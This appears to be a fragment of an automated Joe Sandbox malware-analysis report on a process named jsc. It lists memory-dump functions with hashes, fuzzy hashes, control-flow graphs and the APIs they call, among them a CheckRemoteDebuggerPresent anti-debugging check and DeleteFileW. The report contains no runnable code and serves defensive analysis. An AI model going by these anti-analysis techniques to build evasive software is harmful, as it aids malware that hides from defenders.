                                                                          • Source File: 00000030.00000002.2875980880.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_10c0000_jsc.jbxd
                                                                          Similarity
                                                                          • API ID: CheckDebuggerPresentRemote
                                                                          • String ID:
                                                                          • API String ID: 3662101638-0
                                                                          • Opcode ID: 22db2db4ad685bc795baf6a6411d552136781d669db18b827ed3204ee6f15861
                                                                          • Instruction ID: 2d04745ef0ebc853e31b9b2435c993e7fcb9c80e116ff51af2e32661aa1e66d2
                                                                          • Opcode Fuzzy Hash: 22db2db4ad685bc795baf6a6411d552136781d669db18b827ed3204ee6f15861
                                                                          • Instruction Fuzzy Hash: CF2145B1800259CFCB14CF9AD884BEEFBF4AF48320F14846AE459A3250C738A944CFA0
                                                                          Function 010C7ED8 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2381 10c7ed8-10c7f64 CheckRemoteDebuggerPresent 2383 10c7f6d-10c7fa8 2381->2383 2384 10c7f66-10c7f6c 2381->2384 2384->2383
                                                                          APIs
                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 010C7F57
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.2875980880.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_10c0000_jsc.jbxd
                                                                          Similarity
                                                                          • API ID: CheckDebuggerPresentRemote
                                                                          • String ID:
                                                                          • API String ID: 3662101638-0
                                                                          • Opcode ID: b7cd86e12ed337625cd7f7c3c3b97e62bf158ce3a86a86a4dbab1c594511c761
                                                                          • Instruction ID: 3b8c53f97e0f925483603bcea87be0bbaa7a75b78fda685879138ec9cd1bc0e9
                                                                          • Opcode Fuzzy Hash: b7cd86e12ed337625cd7f7c3c3b97e62bf158ce3a86a86a4dbab1c594511c761
                                                                          • Instruction Fuzzy Hash: D82136B1C00259CFCB14CF9AD585BEEBBF4AF48310F14846AE459A3251C738A944CF64
                                                                          Function 010CB648 Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2387 10cb648-10cb69a 2389 10cb69c-10cb69f 2387->2389 2390 10cb6a2-10cb6cd DeleteFileW 2387->2390 2389->2390 2391 10cb6cf-10cb6d5 2390->2391 2392 10cb6d6-10cb6fe 2390->2392 2391->2392
                                                                          APIs
                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 010CB6C0
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.2875980880.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_10c0000_jsc.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          • Opcode ID: b8573d93d4112f0d732462b03bba5bd146d54fba0b7e64e5bc9dbafbedfca558
                                                                          • Instruction ID: f7d248c776f56d5c428c5deb691c7a1b46c8d77678aebdf9464bdc1a50ff4478
                                                                          • Opcode Fuzzy Hash: b8573d93d4112f0d732462b03bba5bd146d54fba0b7e64e5bc9dbafbedfca558
                                                                          • Instruction Fuzzy Hash: 082124B1C006199FDB14CF9AD5457AEFBF4BF48320F14816AD858A7250D738A940CFA4
                                                                          Function 010CB650 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 010CB6C0
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.2875980880.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_10c0000_jsc.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          • Opcode ID: c1025525e7e1b34972bd0a59bc9e58ee3543143ff2020d91048e3f74bfb46f5c
                                                                          • Instruction ID: 7dbccdcd97389bc73370f3f76e79eb70f1fe25285757d7fb8fb6ca7c828049f9
                                                                          • Opcode Fuzzy Hash: c1025525e7e1b34972bd0a59bc9e58ee3543143ff2020d91048e3f74bfb46f5c
                                                                          • Instruction Fuzzy Hash: B81133B1C0061A9BCB14CF9AC545B9EFBF4BF48720F10816AD858A7250D738A940CFA5
                                                                          Function 0107D044 Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.2874671635.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_107d000_jsc.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e01fa846f3f9a47e76cc320f98a42ff5c9d9e355e83df2fc6419c787f1c92d07
                                                                          • Instruction ID: e6c2f733cc07b3d481dce6555409a1fcdbef5eac33af9bd0302cc14aabd7210e
                                                                          • Opcode Fuzzy Hash: e01fa846f3f9a47e76cc320f98a42ff5c9d9e355e83df2fc6419c787f1c92d07
                                                                          • Instruction Fuzzy Hash: 0D213771904204EFCB12DF68D9C4B26BBA5FF84314F20C5ADE9894B252C737D446CBA5
                                                                          Function 0107D03F Relevance: .1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.2874671635.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_107d000_jsc.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                          • Instruction ID: 5c23398b3f93d3ebd27dce4c5d4f8ae33575a013c56ba48d74081d9e94485451
                                                                          • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                          • Instruction Fuzzy Hash: E211D075904244DFDB12CF54D5C4B15BFA1FF44314F24C6A9E9894B252C33AD44ACFA1